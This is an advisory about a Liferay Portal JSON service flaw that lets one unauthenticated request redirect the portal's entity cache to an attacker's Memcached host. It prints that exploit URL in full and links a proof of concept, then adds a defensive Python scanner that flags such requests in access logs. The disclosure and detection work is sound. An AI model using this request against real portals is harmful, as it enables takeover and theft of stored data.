securityvulns SECURITYVULNS:DOC:27949
Apr 23, 2012
vulners.com
Specially crafted Json service request allows full control over a
Liferay portal instance

Description:

Liferay Portal is an enterprise portal written in Java.

With a single HTTP request you can reconfigure Liferay to use a
remote Memcached cache instead of its own cache:

http://vulnerablehost/c/portal/json_service?serviceClassName=com.liferay.portal.service.UserServiceUtil&serviceMethodName=updatePortrait&serviceParameters=[%22userId%22%2C%22bytes%22]&userId=1&bytes={"class":"com.liferay.portal.kernel.dao.orm.EntityCacheUtil","entityCache":{"class":"com.liferay.portal.dao.orm.common.EntityCacheImpl","multiVMPool":{"class":"com.liferay.portal.cache.MultiVMPoolImpl","portalCacheManager":{"class":"com.liferay.portal.cache.memcached.MemcachePortalCacheManager","timeout":60,"timeoutTimeUnit":"SECONDS","memcachedClientPool":{"class":"com.liferay.portal.cache.memcached.DefaultMemcachedClientFactory","connectionFactory":{"class":"net.spy.memcached.BinaryConnectionFactory"},"addresses":["remoteattackerhost:11211"]}}}}}

This means that all entities stored in the database will now be cached
in a Memcached instance hosted on the attacker's host, where they can
be retrieved or manipulated at will by the attacker. A moderately
skilled attacker could leverage this to gain administrative access to
the system. The attacker does not need to have an account on the
portal in order to execute this attack.
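The root cause described above is that the JSON service endpoint turns a "class" key in a request parameter into a server-side object. A defender can look for exactly that pattern in web server access logs. The following scanner is an added example, not code from the advisory or from Liferay: it assumes Combined Log Format lines, URL-decodes the query string of every request to /c/portal/json_service, parses any parameter that carries JSON, and reports the request if a "class" key appears anywhere in it. The sample log lines are constructed; the class names in the suspicious line are the ones quoted in the advisory's request.

```python
"""Flag json_service requests whose parameters carry JSON with a "class" key.

Added example (not from the advisory or from Liferay). Assumes Combined Log
Format access-log lines; the sample lines below are constructed.
"""
import json
import re
from urllib.parse import urlsplit, parse_qsl

JSON_SERVICE_PATH = "/c/portal/json_service"

# host ident user [timestamp] "METHOD target PROTOCOL" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: a normal page view, a normal json_service call, and a
# json_service call whose "bytes" parameter names classes to instantiate.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [23/Apr/2012:10:00:00 +0000] "GET /web/guest/home HTTP/1.1" 200 8192',
    '10.0.0.5 - - [23/Apr/2012:10:00:01 +0000] "GET /c/portal/json_service'
    '?serviceClassName=com.liferay.portal.service.UserServiceUtil'
    '&serviceMethodName=getUserById&serviceParameters=%5B%22userId%22%5D'
    '&userId=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [23/Apr/2012:10:00:02 +0000] "GET /c/portal/json_service'
    '?serviceClassName=com.liferay.portal.service.UserServiceUtil'
    '&serviceMethodName=updatePortrait'
    '&serviceParameters=%5B%22userId%22%2C%22bytes%22%5D&userId=1'
    '&bytes=%7B%22class%22%3A%22com.liferay.portal.kernel.dao.orm.EntityCacheUtil%22'
    '%2C%22entityCache%22%3A%7B%22class%22%3A'
    '%22com.liferay.portal.dao.orm.common.EntityCacheImpl%22%7D%7D HTTP/1.1" 200 17',
]


def find_class_keys(value, found=None):
    """Recursively collect the string values of every "class" key in parsed JSON."""
    if found is None:
        found = []
    if isinstance(value, dict):
        for key, inner in value.items():
            if key == "class" and isinstance(inner, str):
                found.append(inner)
            find_class_keys(inner, found)
    elif isinstance(value, list):
        for item in value:
            find_class_keys(item, found)
    return found


def analyze_request_target(target):
    """Return a finding dict for a json_service request that names classes, else None."""
    parts = urlsplit(target)
    if parts.path != JSON_SERVICE_PATH:
        return None
    # parse_qsl percent-decodes names and values and splits on the first '='.
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    classes = []
    for raw in params.values():
        if not raw.startswith(("{", "[")):
            continue  # plain scalar parameter, not JSON
        try:
            parsed = json.loads(raw)
        except ValueError:
            continue  # malformed JSON is not what this check is about
        classes.extend(find_class_keys(parsed))
    if not classes:
        return None
    return {
        "service": params.get("serviceClassName", ""),
        "method": params.get("serviceMethodName", ""),
        "classes": classes,
    }


def scan_log(lines):
    """Run the check over access-log lines; return one finding per suspicious request."""
    findings = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue
        finding = analyze_request_target(match.group("target"))
        if finding:
            finding.update(ip=match.group("ip"), ts=match.group("ts"),
                           status=match.group("status"))
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG_LINES):
        print(f"{f['ts']} {f['ip']} {f['service']}.{f['method']} -> {', '.join(f['classes'])}")
```

The check is deliberately coarse: a legitimate client never needs to name a Java class in a service parameter, so any "class" key on this endpoint is worth an alert regardless of which class it names. Requests sent as POST bodies are not visible in a standard access log, so the same check belongs in a request-logging filter or WAF rule in front of the portal as well.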

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/LPS-26558-proof

Systems affected:

Liferay 6.1 CE is confirmed to be vulnerable.
Liferay 6 EE Service Pack 2 is most likely vulnerable.
Liferay 6.1 EE is most likely vulnerable.

Vendor status:

Liferay was notified on April 6, 2012 by filing a bug in their public
bug tracker under issue number LPS-26558. The issue has since been
flagged as private and has been resolved.